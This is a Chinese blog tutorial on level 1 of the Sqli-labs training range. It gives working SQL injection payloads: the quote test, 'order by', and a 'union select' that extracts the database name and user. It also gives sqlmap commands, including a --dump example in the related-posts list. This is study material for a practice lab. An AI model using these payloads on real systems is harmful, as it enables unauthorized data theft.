Sqli-labs靶场第1关详解[Sqli-labs-less-1]

已于 2024-02-19 11:11:48 修改
阅读量514 收藏 6
点赞数 12
分类专栏: sqli-labs 文章标签: 数据库 网络安全 web安全 安全 网络攻击模型
于 2024-02-19 11:10:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73615178/article/details/136159739
版权

Sqli-labs-Less-1

前言:

SQL注入的三个条件:
①参数可控;(从参数输入就知道参数可控)
②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)
③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)

利用 order by 来测列数

测显位:mysql用1,2,3,4

 Mysql获取相关数据:

一、数据库版本-看是否认符合information_schema查询-version()
二、数据库用户-看是否符合root型注入攻击-user()
三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os
四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()

 #手工注入

根据提示 利用id 进行传参  ?id=1 ?id=2 ?id=13 ?id=0

  1.通过一下id进行传参测试,发现i1<=id<=12有返回值,其它的不存在

​​

2.使用单引号' 进行测试判断注入参数闭合方式

目的:如果构造的语句成功被数据库执行,而不是被视为字符串,反之为字符串。

payload,很明显可以看出我们输入的1'是被单引号所闭合的。

http://192.168.0.7:802/sqli-labs/Less-1/?id=1'

3.使用order by 进行测字段数,当值为4时报错,所以列数为3,--+主要目的是闭合后续的单引号。

http://192.168.0.7:802/sqli-labs/Less-1/?id=1' order by 4 --+

4.使用联合查询注入,mysql使用(1,2,3)进行测显位,id=不存在 的值才能回显, 利用id=-1发现2,3为能够回显到前端中的。

http://192.168.0.7:802/sqli-labs/Less-1/?id=-1' union select 1,2,3--+

 5.利用回显位,爆库名、当前用户。     得到数据库名为security,当前用户为:root@localhost

http://192.168.0.7:802/sqli-labs/Less-1/?id=-1' union select 1,database(),user()--+

成功利用sql漏洞!!!

 #自动化注入-SQLmap工具注入

SQLmap用户手册:文档介绍 - sqlmap 用户手册

爆库名、当前用户。     得到数据库名为security,当前用户为:root@localhost

python sqlmap.py -u http://192.168.0.7:802/sqli-labs/Less-1/?id=1 --current-db --current-user

 成功利用sql漏洞!!!

「已注销」
关注
  • 12
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Sqli-labs靶场详细攻略Less 1-5
qq_41755084的博客
10-09 1510
Sqli-labs靶场详细攻略
详细sqli-labs(1-65)通讲解
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
sql-labs靶场less 1~6
qq_63011209的博客
11-06 429
sql注入一般流程: 1.判断注入点:判断注入类型,数字型还是字符型; 2.查字段数:常用指令:“order by” 3.依次查询数据库,表名,列名 4.从表中查询到所需数据 less 1: 1) 判断注入点 存在注入点,判断注入类型 1=2没有执行说明,不是数字型注入,接下来猜字符型的闭合方式,或直接去找源代码 猜测双引号,结果报错,成功 2)查字段数 说明字段数为3; 3)开始搜索数据: 数据库,版本 表名 一般id和密码会储存在u...
Sqli-Labs~1 详解
Cy610610的博客
12-04 1233
sqli-labs第一,手把手教学,包学包会!内含informations_schema数据库解释说明等相内容
sqli-labs第一详解 纯新手向 含原理
髣髴兮若轻云之蔽月
04-23 2306
Less-01 为方便初学者理解,更改了sqli-labs的源码,以显示sql语句 后期学习中需要自己推理 初始页面 在url后面用get传值id=1,随后能看到网页出现变化 如下图 不断更改上传id的值,会有不同的用户信息显示。 按递增顺序直到14为止, 即(1~14) 判断注入点是否存在且能否使用 一般使用单引号进行判断,加到url后面 出现报错 内容大致为LIMIT0,1附近有语法错误。 为什么要使用单引号进行判断 实际上,我们可以看到sql语句为 SELECT * FROM users
Sqllab第一笔记
最新发布
I_WORM的博客
03-10 801
知识点:明白数值注入和字符注入的区别联合查询:union 或者 union allconcat()concat_ws(分隔符,字符串)
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场
02-12
sqli-labs靶场
安装sqli-labs
10-22
sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地Web靶场 在开始安装sqli-labs之前,需要了解为什么要使用本地Web靶场。随着网络安全威胁的增加...
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析 详细,超级详细
SQLI-LABS(一)
weixin_51075988的博客
11-23 1332
SQLI-LABS (一) 学习前的准备: sql是什么? sql注入:在web应用程序事先定义好的查询语句结尾添加额外SQL语句, 欺骗数据库服务器执行非授权的任意查询,得到相应的数据信息,进行提权等; 2、搭建sqli-labs(可以使用phpstudy搭建); 3、学会在 mysql命令行 中进行 mysql的基本用法 ; mysql命令行的具体打开方法:找到\phpstudy_pro\extensions\mysql5.7.26\bin ,在Windows命令中进入bin中,输入"mysql -u
sqli-labs 1-10(GET型注入)新手通详解(高手误入)
b1n的博客
07-16 2902
1.第一是单引号字符型注入2.用--+进行注释,页面正常显示。
SQLI-lab(1)
weixin_52515588的博客
02-22 220
下面这个是单引号,这里报错大概的意思就是把原本SQL语句id=' '的单引号闭合掉了,而我们输入的内容就是引号里面的东西,我们既然闭合掉前面的了,那么后面的就单着了,而我们的payload中使用--+注释掉后面的单引号了,这里注释掉的意思就是不作为SQL语句继续执行了;那么他就会执行前面的内容。在这里前面为什么是-1,而不是1呢,我们得保证前面查询出来的是错误的结果,因为前面是正确的内容会一直显示正确的东西就不会执行后面的了,因为你后面的在数据库中根本没有,你只有前面是错的了,最终才会报错。
sqli-labs一第一详细步骤,新手打基础篇
qq_50956249的博客
03-21 567
5、查出数据库名称后,爆破表名,union 1,group_concat(table_name),3,…union 1,2,group_concat(column_name),…7、查出了具体的字段名,最后一步就是查出具体的数据了,union 1,2,group _concat(username,id,password) from users–+4、先查出使用的是哪个数据库,用database()函数,以及数据库版本信息,用version()函数。输入1’–+,有用户显示。输入 1,有用户显示。
Sqli-labs靶场笔记1(Less-1 SQL注入基本操作)
m0_52233414的博客
03-31 416
sqli-labs靶场使用的是mysql数据库,所以在打之前,我们要了解一下mysql数据库的结构,mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,该数据库下面有两个表一个是tables和columns。tables这个表的table_name字段下面是所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。columns这个表的colum_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库
sqli-labs1-10心得与思路
m0_48294281的博客
03-08 6106
sqli-labs 1-11个人心得,欢迎交流指正。
sqlmap跑sqli-labs靶场第一
01-06
以下是使用sqlmap跑sqli-labs靶场第一的步骤: 1. 下载并安装sqlmap工具。你可以从官方网站下载sqlmap工具并按照说明进行安装。 2. 打开终端或命令提示符,并导航到sqlmap的安装目录。 3. 运行以下命令来检测目标网站是否存在SQL注入漏洞: ```shell python sqlmap.py -u "http://127.0.0.1/sqli1/Less-1/?id=1" --level=5 --risk=3 --dbs ``` 这个命令将使用sqlmap工具对目标网站进行扫描,并尝试发现数据库。 4. 如果目标网站存在SQL注入漏洞sqlmap将返回数据库的名称。你可以使用以下命令来获取数据库的名称: ```shell python sqlmap.py -u "http://127.0.0.1/sqli1/Less-1/?id=1" --level=5 --risk=3 --dbs --batch --dump ``` 这个命令将获取数据库的名称,并尝试获取数据库中的表和数据。 请注意,上述命令中的URL和参数可能需要根据你的实际情况进行修改。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值